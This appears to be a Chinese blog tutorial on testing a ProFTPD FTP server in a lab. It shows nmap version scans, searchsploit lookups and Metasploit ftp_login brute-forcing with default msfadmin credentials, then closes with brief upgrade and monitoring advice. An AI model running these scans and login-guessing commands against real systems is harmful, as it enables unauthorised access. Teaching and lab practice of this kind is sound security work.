当前位置:网站首页>6-20漏洞利用-proftpd测试
6-20漏洞利用-proftpd测试
2022-07-28 17:10:00 【山兔1】

proftpd介绍
ProFTPD:一个Unix平台上或是类Unix平台上(如Linux,FreeBSD等)的FTP服务器程序
http://www.proftpd.org/

可以下载对应的版本,然后进行环境搭建
探测目标proftpd
使用nmap -sV -p 2121 IP地址 探测目标proftpd版本信息

在这里,我们可以清晰的探测到版本信息
我们先探测目标开放的端口
nmap 192.168.1.105
下面,我们就使用具体的版本信息,来探测目标信息
nmap -sV -p 2121 192.168.1.105
以上,我们就完成了对应的版本探测
exploit-db搜索目标漏洞
在https://www.exploit-db.com/输入对应软件及版本搜索是否有漏洞

如果没有搜索出来,说明这个版本没有具体的漏洞
searchsploit proftpd 1.3

可以看到这个是1.3的漏洞
searchsploit proftpd 1.3.1

我们看到1.3.1也是没有搜索出对应的漏洞,当然,我们也可以拿proftpd版本的漏洞,在这上面尝试
msf暴力破解
使用metasploit下的 auxiliary/scanner/ftp/ftp_login 进行目标探测

可以看到有很多的漏洞,我们可以根据实际情况,下载版本进行测试,我们从官网下载,即可安装搭建,可以看到有很多的rce漏洞
msfconsole
use auxiliary/scanner/ftp/ftp_login
show options

set rhosts 192.168.1.105
set rport 2121

我们在设置的时候,可以设置21号端口,前提是,这个端口,运行ftp服务,rhosts是一定要设置具体的IP地址,或者CIDR,就会对当前下的IP地址,进行猜解
set username msfadmin

实际情况下,我们也可以设置对应的用户文件
set password msfadmin
run

1、将软件升级到最新的版本,不存在漏洞的版本
2、加强监控,对当前的系统加强监控,关闭不必要的端口
边栏推荐
- Meta Q2 earnings: revenue fell for the first time, and metaverse will compete with apple
- Kali doesn't have an eth0 network card? What if you don't connect to the Internet
- GC garbage collector details
- GC垃圾回收器详解
- Two month software testing training scam? How to choose training institutions?
- LeetCode_ 96_ Different binary search trees
- unity CS1513
- Swiftui component how to implement textfield of hidden part of phone number mask (tutorial includes source code)
- New upgrade! The 2022 white paper on cloud native architecture was released
- What is one hot code? Why use it and when?
猜你喜欢

Meta Q2 earnings: revenue fell for the first time, and metaverse will compete with apple

Self cultivation of Electronic Engineers - when a project is developed

LeetCode_ 63_ Different paths II

【图像分割】基于方向谷形检测实现静脉纹路分割附MATLAB代码

【实战】用OpenCV实现页面扭曲矫正

When unity customizes the editor, let the subclass inherit the inspector display effect of the parent class

The switching language of unity causes an error: system FormatException:String was not recognized as a valid DateTime.

Introduction and advanced MySQL (7)

湖上建仓全解析:如何打造湖仓一体数据平台 | DEEPNOVA技术荟系列公开课第四期

Special Lecture 6 tree DP learning experience (long-term update)
随机推荐
My creation anniversary -- July 25th, 2022
If you want to learn software testing, where can you learn zero foundation?
EasyCVR设备离线后无法再次上线该如何解决?
OAI L3 and L2 interface analysis
Full analysis of warehouse building on the lake: how to build a lake warehouse integrated data platform | deepnova technology collection series open class phase IV
微信安装包11年膨胀575倍,UP主:“98%的文件是垃圾”;苹果应用商店被曝大量色情App;四大科技巨头呼吁废除闰秒|极客头条...
Easynlp Chinese text and image generation model takes you to become an artist in seconds
112. 使用自开发的代理服务器解决 SAP UI5 FileUploader 上传文件时遇到的跨域访问错误
2022 Hangdian multi school field 2 1011 DOS card (line segment tree)
Win11电脑摄像头打开看不见,显示黑屏如何解决?
Is zero basic software testing training reliable?
Can zero basis software testing work?
C and SQL mixed programming, vs need to download what things
[R language - basic drawing]
How new people get started learning software testing
【图像隐藏】基于DCT、DWT、LHA、LSB的数字图像信息隐藏系统含各类攻击和性能参数附matlab代码
数字经济时代的开源数据库创新 | 2022开放原子全球开源峰会数据库分论坛圆满召开
配置教程:新版本EasyCVR(v2.5.0)组织结构如何级联到上级平台?
Introduction and advanced level of MySQL (I)
Leetcode binary tree class